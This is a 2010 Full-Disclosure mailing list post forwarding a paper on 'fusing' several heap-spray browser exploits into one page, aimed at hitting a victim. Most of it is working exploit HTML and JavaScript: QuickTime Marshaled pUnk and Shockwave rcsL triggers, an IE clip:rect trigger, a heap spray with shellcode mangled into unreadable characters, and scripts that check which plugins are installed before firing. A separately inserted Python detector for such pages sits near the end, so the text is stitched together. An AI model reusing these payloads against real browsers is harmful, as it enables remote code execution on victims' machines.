
List:       full-disclosure
Subject:    [Full-disclosure] Fwd: Fusion of Exploits - Multiplexing
From:       Prashant Uniyal <happyterminator () gmail ! com>
Date:       2010-12-30 9:58:25
Message-ID: AANLkTintAmYE3FVGaXjbOTkSga8Uofd6TTwqjbBo3SSx () mail ! gmail ! com



---------- Forwarded message ----------
From: Prashant Uniyal <happyterminator@gmail.com>
Date: Wed, Dec 29, 2010 at 12:03 PM
Subject: Fusion of Exploits - Multiplexing exploitation
To: submit@offsec.com, submissions@packetstormsecurity.org


Hello!

A white paper on exploitation. Topic: Fusion Of Exploits. Multiplexing
exploitation. Sorry for the delay. Reattached.

Thanks and Regards
-- 
Prashant Uniyal
www.hackingethics.wordpress.com






-- 
Prashant Uniyal
www.hackingethics.wordpress.com



["Fusion of Xploits - Multiplexing exploitation.txt" (text/plain)]

**Fusion of Xploits - Multiplexing exploitation**

**RESEARCH TEAM: Legion Of XTRemers, India**

**SPECIAL GREETZ TO: SECFENCE TEAM AND GARAGE 4 HACKERS**


A single chance to exploit a specific victim is worth more than anything else, and a hacker will, by hook or by crook, never give up even a little of the probability of such a chance. In such scenarios, normal exploitation strategies fail to cash in these precious chances. But why does normal exploitation fail? In a kill-all type situation several exploits are bundled together to raise the chances of successful remote code execution. But in some cases we cannot infer which vulnerable products are loaded on the target victim's box. So for certain types of exploits, which need exclusive resources, one non-legitimate contender exploit will cause the eligible exploit to fail. This situation is mostly faced with heap spray type exploits, though several other types behave in a similar fashion.

In this paper we'll discuss the fusion of multiple heap spray based exploits in such a way that they execute under the same roof (a resource shared among them). Vulnerabilities which get triggered by JavaScript and do not need any extra plugin or ActiveX component are the simplest cases to trigger in sequence. But for the fusion of exploits which use ActiveX components or plugins, we have to tackle a few problems first before triggering the vulnerability.

In this paper I am going to fuse the Apple QuickTime Marshaled pUnk exploit and a zero-day of Adobe.

Apple QuickTime Marshalled pUnk code:

<script language=javascript>
addr = 354552864; // 0x15220C20 [pUnk]
var obj= '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>' +'<' + 'PARAM name="_Marshaled_pUnk" value="'+addr+'"' + '/>' +'<'+'/'+'object>';
document.write(obj);
</script>


And vulnerability trigger for Shockwave player rcsL chunk memory corruption:

<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"
codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version,5,0,593"
ID=shockit width`0 heightC0 VIEWASTEXT>
<param name=src value="exploit.DIR">
<param name=swRemote value="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' ">
<param name=swStretchStyle value=fill>
<param name=PlayerVersion value>
<PARAM NAME=bgColor VALUE=#FFFFFF>
<embed src="exploit.DIR" bgColor=#FFFFFF width`0 heightC0 swRemote="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' " swStretchStyle=fill type="application/x-director" PlayerVersion pluginspage="http://www.macromedia.com/shockwave/download/"></embed>
</object>


Note: The Shockwave vulnerability needs a file exploit.DIR which is bundled with the original exploit. Download it from: http://www.exploit-db.com/exploits/15296/


And we'll use the following heap spray code for exploitation of these vulnerabilities:


<script language=javascript>
/*---------- Heap-Spray Circuit ------------*/
var shellcode=unescape('Javascript Unicode Shellcode');
block=unescape("%u0c0c?");
headersize ;
space=headersize+shellcode.length;
while(block.length<space) {
block+=block;
}
suffixBlock=block.substring(0,space);
blk=block.substring(0,block.length-space);
while(blk.length+space<40000) {
blk=blk+blk+suffixBlock;
}
arrBuffer=new Array();
for(var i=0;i<800;i++) {
arrBuffer[i]=blk+shellcode;
}
/*---------- Heap-Spray Circuit end------------*/
</script>


When multiple vulnerability triggers are fused together, we reduce the race condition among them: if the first trigger works properly and the exploitation succeeds, the browser normally does not fire the other triggers, because in most cases the browser process silently gets deferred. This reduces the race condition overhead among the exploits.

Typically, the pseudo structure of a fused exploit should be like this:

[Heap Spray]
[1st vulnerability trigger]
[2nd vulnerability trigger]


This will work if the 1st vulnerability gets triggered properly. But it will fail if the object corresponding to the 1st trigger is absent: in that case the garbage collector runs and the whole spray vanishes before the 2nd vulnerability is triggered. This situation is undesirable and foils the exploitation attempt even if the 2nd vulnerability was itself capable of exploiting the target.

To solve this problem, before triggering a vulnerability we must ensure that its corresponding component is present in the target browser. The fused exploit pseudo structure proposed above then becomes:

variable go1 = false
variable go2 = false
if : [1st component present] -->go1 = true
else if [2nd component present] -->go2 = true

[Heap Spray]

if [go1 == true] --> [1st vulnerability trigger]
else if[go2 == true] --> [2nd vulnerability trigger]


But how do we know whether a particular component is present? HTML is stateless and in most cases does not tell us whether a component is present or not. To overcome this hindrance, we should call the component before the spray and check the default values of its properties. In other cases, we should use the component in the proper way, have it process something, and check the processed output.

In some cases scripts can tell us whether a particular component is present or not. For Adobe Shockwave, we can check for example the src value of the Shockwave component: if Shockwave is installed, its value will be "" when not specified, and if Shockwave is not installed, its value will be "undefined". We can check it using the following code:


<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258" id="shockex" width=0 height=0></object>
<script language=javascript>
var a=document.getElementById("shockex");
document.write("shockex.src : "+shockex.src);
</script>


The above technique doesn't work for Apple QuickTime's properties, but the following script, given on Apple QuickTime's forums, can detect Apple QuickTime:


<script>
var qcheck = false;
</script>
<script LANGUAGE="VBScript">
Set qtObject = CreateObject("QuickTimeCheckObject.QuickTimeCheck.1")
If IsObject(qtObject) Then
If qtObject.IsQuickTimeAvailable(0) Then
qcheck = true
End If
End If
</script>
<script>
document.write("<BR>quicktime : "+qcheck);
</script>


We can use these scriptlets to decide which vulnerabilities should be triggerred.
By combining all these techniques, we can now construct the fusion exploit:


<!---Fusion Exploit --->
<!---*** Limit on vulnerability triggers : No Limit
Developer : "vinnu"
***--->
<html>
<head><title>Fusion Exploit POC </title></head>
<body>
<script>
var qcheck = false;
var scheck = false;
</script>

<!--------- Component detection circuit --------->
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258" id="shockex" width=0 height=0></object>
<script language=javascript>
var a=document.getElementById("shockex");
if (a.src=="")scheck=true;
</script>

<script LANGUAGE="VBScript">
Set qtObject = CreateObject("QuickTimeCheckObject.QuickTimeCheck.1")
If IsObject(qtObject) Then
If qtObject.IsQuickTimeAvailable(0) Then
qcheck = true
End If
End If
</script>
<script language=javascript>
document.write("<BR>quicktime : "+qcheck);
document.write("<BR>shockex.src : "+shockex.src);
document.write("<BR>Shockwave : "+scheck);
</script>
<!--------- Component detection circuit end --------->
<script language=javascript>
/*------ 1st vulnerable component --------*/
addr = 202116108;// 0x0C0C0C0C [pUnk]
var obj= '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>' +'<' + 'PARAM name="_Marshaled_pUnk" value="'+addr+'"' + '/>' +'<'+'/'+'object>';
/*------ 1st vulnerable component end --------*/
/*------ 2nd vulnerable component --------*/
sobj = '<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"'
+ '\n codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version,5,0,593"'
+ '\n ID=shockit width`0 heightC0 VIEWASTEXT>'
+ '\n<param name=src value="exploit.DIR">'
+ '\n<param name=swRemote value="swSaveEnabled=\'true\' swVolume=\'true\' swRestart=\'true\' swPausePlay=\'true\' swFastForward=\'true\' swContextMenu=\'true\' ">'
+ '\n<param name=swStretchStyle value=fill>'
+ '\n<param name=PlayerVersion value>'
+ '\n<PARAM NAME=bgColor VALUE=#FFFFFF> '
+ '\n<embed src="exploit.DIR" bgColor=#FFFFFF width`0 heightC0 swRemote="swSaveEnabled=\'true\' swVolume=\'true\' swRestart=\'true\' swPausePlay=\'true\' swFastForward=\'true\' swContextMenu=\'true\' " swStretchStyle=fill'
+ '\n type="application/x-director" PlayerVersion pluginspage="http://www.macromedia.com/shockwave/download/"></embed>'
+ '\n</object>';
/*------ 2nd vulnerable component end --------*/
</script>

<script>
/*---------- Heap-Spray Circuit ------------*/
/*--- executes calc.exe shellcode ---*/
var i = 0,alimit = 800,slimit = 0x40000, uagent = navigator.userAgent;
var arrBuffer=new Array();
if(uagent.indexOf("MSIE 6.0")>=0) {
alimit = 500;
slimit = 0x24000;
}
var shellcode=unescape('???????????"?????????????????? \
??????????°??????????????????????????????????????? ????????????????????????????????????'); \
block=unescape("??"); headersize ;space=headersize+shellcode.length;
while(block.length<space) {
block+=block;
}
suffixBlock=block.substring(0,space);
blk=block.substring(0,block.length-space);
while(blk.length+space<slimit) {
blk=blk+blk+suffixBlock;
}
for(i=0;i<alimit;i++) {
arrBuffer[i]=blk+shellcode;
}
/*---------- Heap-Spray Circuit end------------*/
</script>
<script>
/*---------vulnerability trigger circuit--------------*/
if (qcheck == true)document.write(obj); /*---- 1st vulnerability trigger ----*/
else if (scheck == true)document.write(sobj); /*---- 2nd vulnerability trigger ----*/
/*-------vulnerability trigger circuit end------------*/
</script>
</body>
</html>

<!--- Fusion Exploit End --->





<----------------------------------->

Spraying Spare Spray: In some cases the different exploits may need varying amounts of heap spray. The best results are achieved if the vulnerabilities needing the least spray are triggered first, in increasing order of the required amount of spray. For example, a new zero-day of IE that requires a high amount of heap spray can also be fused with the above exploit POC.

Following is the trigger of new IE vulnerability for IE 6,7,8:


document.write("<table style=position:absolute;clip:rect(0)>");


But it needs a larger amount of spray, so we can spray a little more just before triggering it. The following code will do enough spray for successful code execution:


<script language=javascript>
for(;i<1500;i++) {
arrBuffer[i]=blk+shellcode;
}
</script>



And the code that needs to be implanted into the above POC is:


<script language=javascript>
for(;i<1500;i++) {
arrBuffer[i]=blk+shellcode;
}
document.write("<table style=position:absolute;clip:rect(0)>");
</script>



With the IE exploit included too, the fusion exploit POC becomes:



<!---Fusion Exploit --->
<!---*** Limit on vulnerability triggers : No Limit
Developer : "vinnu"
***--->
<html>
<head><title>Fusion Exploit POC </title></head>
<body>
<script>
var qcheck = false;
var scheck = false;
</script>

<!--------- Component detection circuit --------->
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258" id="shockex" width=0 height=0></object>
<script language=javascript>
var a=document.getElementById("shockex");
if (a.src=="")scheck=true;
</script>

<script LANGUAGE="VBScript">
Set qtObject = CreateObject("QuickTimeCheckObject.QuickTimeCheck.1")
If IsObject(qtObject) Then
If qtObject.IsQuickTimeAvailable(0) Then
qcheck = true
End If
End If
</script>
<script language=javascript>
document.write("<BR>quicktime : "+qcheck);
document.write("<BR>shockex.src : "+shockex.src);
document.write("<BR>Shockwave : "+scheck);
</script>
<!--------- Component detection circuit end --------->
<script language=javascript>
/*------ 1st vulnerable component --------*/
addr = 202116108;// 0x0C0C0C0C [pUnk]
var obj= '<' + 'object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" width="0" height="0"'+'>' +'<' + 'PARAM name="_Marshaled_pUnk" value="'+addr+'"' + '/>' +'<'+'/'+'object>';
/*------ 1st vulnerable component end --------*/
/*------ 2nd vulnerable component --------*/
sobj = '<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"'
+ '\n codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version,5,0,593"'
+ '\n ID=shockit width`0 heightC0 VIEWASTEXT>'
+ '\n<param name=src value="exploit.DIR">'
+ '\n<param name=swRemote value="swSaveEnabled=\'true\' swVolume=\'true\' swRestart=\'true\' swPausePlay=\'true\' swFastForward=\'true\' swContextMenu=\'true\' ">'
+ '\n<param name=swStretchStyle value=fill>'
+ '\n<param name=PlayerVersion value>'
+ '\n<PARAM NAME=bgColor VALUE=#FFFFFF> '
+ '\n<embed src="exploit.DIR" bgColor=#FFFFFF width`0 heightC0 swRemote="swSaveEnabled=\'true\' swVolume=\'true\' swRestart=\'true\' swPausePlay=\'true\' swFastForward=\'true\' swContextMenu=\'true\' " swStretchStyle=fill'
+ '\n type="application/x-director" PlayerVersion pluginspage="http://www.macromedia.com/shockwave/download/"></embed>'
+ '\n</object>';
/*------ 2nd vulnerable component end --------*/
</script>

<script>
/*---------- Heap-Spray Circuit ------------*/
/*--- executes calc.exe shellcode ---*/
var i = 0,alimit = 800,slimit = 0x40000, uagent = navigator.userAgent;
var arrBuffer=new Array();
if(uagent.indexOf("MSIE 6.0")>=0) {
alimit = 500;
slimit = 0x24000;
}
var shellcode=unescape('%u9090??????????"????????????? \
???????????????°?????????????????????????????????? ?????????????????????????????????????????'); \
block=unescape("??"); headersize ;space=headersize+shellcode.length;
while(block.length<space) {
block+=block;
}
suffixBlock=block.substring(0,space);
blk=block.substring(0,block.length-space);
while(blk.length+space<slimit) {
blk=blk+blk+suffixBlock;
}
for(i=0;i<alimit;i++) {
arrBuffer[i]=blk+shellcode;
}
/*---------- Heap-Spray Circuit end------------*/
</script>
<script>
/*---------vulnerability trigger circuit--------------*/
if (qcheck == true)document.write(obj); /*---- 1st vulnerability trigger ----*/
else if (scheck == true)document.write(sobj); /*---- 2nd vulnerability trigger ----*/
/*-------vulnerability trigger circuit end------------*/
</script>

<script>
/*------------IE exploit--------------*/
// Tested on IE 6. If it fails on higher versions,
// just increase the spray amount a little.
// Doesn't need any component detection code
// the way QuickTime or Shockwave do.

for(;i<1500;i++) {
arrBuffer[i]=blk+shellcode;
}
document.write("<table style=position:absolute;clip:rect(0)>");
/*------------IE exploit end----------*/
</script>


</body>
</html>

<!--- Fusion Exploit End --->
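As an added example, not part of the post or its author's code, the following Python script performs a defender-side static triage of a saved HTML page for the fused-exploit layout described above (component detection circuit, heap spray circuit, two or more gated triggers, including the spare-spray IE trigger). The indicator strings are taken from the post's own snippets; the two sample pages are constructed for this example and contain no shellcode.

```python
"""Static triage of a saved HTML page for the fused-exploit layout described
in the post: a component-detection circuit, a heap-spray circuit and two or
more vulnerability triggers.  Indicator strings come from the post's snippets;
the sample pages at the bottom are constructed for this example."""
import re

# Vulnerability-trigger indicators quoted from the post.
TRIGGERS = {
    "quicktime_marshaled_punk": re.compile(r"_Marshaled_pUnk", re.I),
    "shockwave_director_clsid": re.compile(r"233C1507-6A77-46A4-9443-F871F945D258", re.I),
    "ie_table_clip_rect": re.compile(r"clip\s*:\s*rect\s*\(\s*0\s*\)", re.I),
}
# Component-detection indicators: the VBScript QuickTime probe and the
# Shockwave object's .src default-value check.
DETECTION = {
    "quicktime_check_object": re.compile(r"QuickTimeCheckObject\.QuickTimeCheck", re.I),
    "shockwave_src_probe": re.compile(r"\.src\s*==\s*(\"\"|'')"),
}
# Heap spray: a %u0c0c sled built with unescape() plus a loop that fills an
# array with block+shellcode copies.
SPRAY_SLED = re.compile(r"unescape\(\s*[\"']%u0c0c", re.I)
SPRAY_LOOP = re.compile(r"for\s*\([^)]*\)\s*\{[^}]*\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*\w+")

def scan(html):
    """Return findings; 'fusion' is set only when spray, detection and at
    least two triggers appear together, so a lone CSS clip:rect(0) or a
    legitimate QuickTime detection script does not fire it on its own."""
    triggers = sorted(k for k, rx in TRIGGERS.items() if rx.search(html))
    detection = sorted(k for k, rx in DETECTION.items() if rx.search(html))
    spray = bool(SPRAY_SLED.search(html) and SPRAY_LOOP.search(html))
    return {
        "triggers": triggers,
        "component_detection": detection,
        "heap_spray": spray,
        "fusion": spray and bool(detection) and len(triggers) >= 2,
    }

# Constructed sample mirroring the post's POC layout, shellcode removed.
FUSION_SAMPLE = """
<script>var qcheck=false,scheck=false;</script>
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258" id="shockex"></object>
<script>if (document.getElementById("shockex").src=="") scheck=true;</script>
<script LANGUAGE="VBScript">Set q=CreateObject("QuickTimeCheckObject.QuickTimeCheck.1")</script>
<script>
var shellcode=unescape('%uXXXX'); var block=unescape("%u0c0c%u0c0c");
for(i=0;i<800;i++){ arrBuffer[i]=blk+shellcode; }
var obj='<PARAM name="_Marshaled_pUnk" value="202116108"/>';
if (qcheck) document.write(obj); else if (scheck) document.write(sobj);
</script>"""
# Constructed benign page: shares one indicator but none of the structure.
BENIGN_SAMPLE = "<html><body><p>Use clip:rect(0) to hide an element.</p></body></html>"

if __name__ == "__main__":
    print(scan(FUSION_SAMPLE))
    print(scan(BENIGN_SAMPLE))
```

Run against a directory of captured landing pages, the `fusion` flag separates pages with the full layout from pages that merely mention one indicator.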



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

